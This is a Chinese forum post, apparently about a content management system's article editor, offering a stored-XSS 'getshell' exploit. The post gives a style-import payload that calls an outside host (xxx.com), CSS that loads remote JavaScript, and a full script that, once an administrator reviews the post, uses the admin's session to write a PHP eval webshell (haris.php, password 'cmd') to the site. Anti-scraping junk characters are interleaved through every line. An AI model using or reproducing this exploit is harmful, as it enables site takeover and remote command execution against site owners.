<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
' \4 x3 t7 G* ^& `3 S( E/ P为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
$ g, F7 i% U7 Q! C目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
2 h C9 } t" Z% O3 u下面说说利用方法。: R8 b8 ^3 [7 }: r6 _+ {
条件有2个:
2 o. t9 o0 e4 K- T1.开启注册7 f. z1 J% V3 a
2.开启投稿
+ o5 A- E' f! y5 } d6 F注册会员----发表文章
9 B, p6 ?; H/ J! Z3 n0 G! F2 @8 Z内容填写:9 j# v+ x4 q4 V# ^. G6 o5 O
复制代码! q+ y5 J7 l2 c5 Y/ N
<style>@im\port'\http://xxx.com/xss.css';</style>
! M( _- J% f E- l2 m0 ^新建XSS.Css
& ]; D$ u8 w" u; C6 X复制代码
1 V7 J) _4 f7 S( d, v2 _0 s.body{
! j' N) P& \' j. \1 c& D0 [background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') } z8 K) S" c v' R6 |
新建xss.js 内容为
: b4 O. t$ ^ ?7 y, }8 [- q( P复制代码
/ L. d7 f1 q8 k+ v* p% y1.var request = false;. _% q8 B& ]) z. b7 ^* g, l
2.if(window.XMLHttpRequest) {# @0 P6 X) D2 J& l2 j; m
3.request = new XMLHttpRequest();
3 ^6 e. {6 ]1 K* G4.if(request.overrideMimeType) {
) X4 [! D% A3 P3 X+ c6 L2 L5.request.overrideMimeType('text/xml');
& B( J0 ?* n- v6.}/ T/ m/ q* c {, U/ r0 O
7.} else if(window.ActiveXObject) {( s( B8 R* {7 T8 Z
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
( N8 D& k9 z1 N- L$ x- c0 u9.for(var i=0; i<versions.length; i++) {
& i3 C" m+ i8 h( b4 E10.try {+ D; ~% z8 v9 G4 e% l. r: ]
11.request = new ActiveXObject(versions);
4 Z7 O! J# r# R l12.} catch(e) {}
1 t" N8 y0 N8 T" F x13.}( Y1 w8 R T) [
14.}( z1 S% l9 B/ ^$ F9 n
15.xmlhttp=request;, y Y$ V2 `# @; Z8 H
16.function getFolder( url ){
' s' |( j0 x$ Y0 V$ a2 Q8 `17. obj = url.split('/')
0 M# Z# q& Y" b% @18. return obj[obj.length-2]! X v! ?0 b. j$ a
19.}
|: @, U, H. t8 {) K/ A20.oUrl = top.location.href;0 Q& Y9 D( x d
21.u = getFolder(oUrl);
1 {2 e9 `- t K4 A% K3 T) ]/ Y22.add_admin();
& e; X7 ^( q7 A23.function add_admin(){. b. v0 F& }& j: V' r0 s1 n# h
24.var url= "/"+u+"/sys_sql_query.php";4 V- o S8 i, x
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
5 D7 D; a6 h% ?+ b' E% {- |8 y. @26.xmlhttp.open("POST", url, true);
+ B6 n1 P0 u2 D( u27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
/ l8 Z- ~0 L5 e& `% y: a28.xmlhttp.setRequestHeader("Content-length", params.length);
* h; w: o0 C3 L& H6 T/ d29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
1 p% l; |/ d) W' s# j( j30.xmlhttp.send(params);
' v! Q3 k$ A1 t0 N, n. y$ X31.}
! M- D; W- [6 x b2 c& e7 Z2 F/ X当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd |